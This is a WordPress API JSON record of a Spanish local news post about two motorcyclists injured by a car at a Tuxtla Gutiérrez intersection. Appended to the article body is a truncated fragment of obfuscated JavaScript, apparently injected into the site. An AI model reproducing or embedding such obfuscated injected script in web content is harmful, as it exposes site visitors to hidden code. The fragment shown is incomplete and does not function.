{"id":10761,"date":"2023-06-27T02:49:45","date_gmt":"2023-06-27T02:49:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10761"},"modified":"2023-06-27T02:49:46","modified_gmt":"2023-06-27T02:49:46","slug":"dos-lesionados-deja-semaforazo-en-la-avenida-central-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10761","title":{"rendered":"Dos lesionados deja semaforazo en la Avenida Central de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1687834028388-1024x765.jpg\" alt=\"\" class=\"wp-image-10762\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1687834028388-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1687834028388-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1687834028388-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1687834028388.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 26 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este lunes por la ma\u00f1ana se registr\u00f3 un accidente en la Avenida Central y Cuarta Poniente, donde resultaron dos motociclistas lesionados.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este accidente ocurri\u00f3 minutos antes de las 9 de la ma\u00f1ana, cuando un Jetta Gris, que circulaba en el sentido de Poniente a Oriente, embisti\u00f3 a los tripulantes de una moto Pulsar de color rojo con negro.<\/p>\n\n\n\n<p>En el lugar se dio a conocer que los motociclistas que corr\u00edan de Sur a Norte, no respetaron el sem\u00e1foro y provoc\u00f3 la colisi\u00f3n.<\/p>\n\n\n\n<p>Por el golpe los motociclistas salieron volando y se estrellaron contra el pavimento.<\/p>\n\n\n\n<p>Los heridos fueron atendidos por param\u00e9dicos y trasladados a un nosocomio para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Los involucrados llegaron a un acuerdo econ\u00f3mico para evitar que las unidades fueran consignadas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 26 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este lunes por la ma\u00f1ana se registr\u00f3 un accidente en la Avenida Central y Cuarta Poniente, donde resultaron dos motociclistas lesionados. Los reportes oficiales informaron que, este accidente ocurri\u00f3 minutos antes de las 9 de la ma\u00f1ana, cuando un Jetta Gris, que circulaba &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10762,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10761","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10761","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10761"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10761\/revisions"}],"predecessor-version":[{"id":10763,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10761\/revisions\/10763"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10762"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10761"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}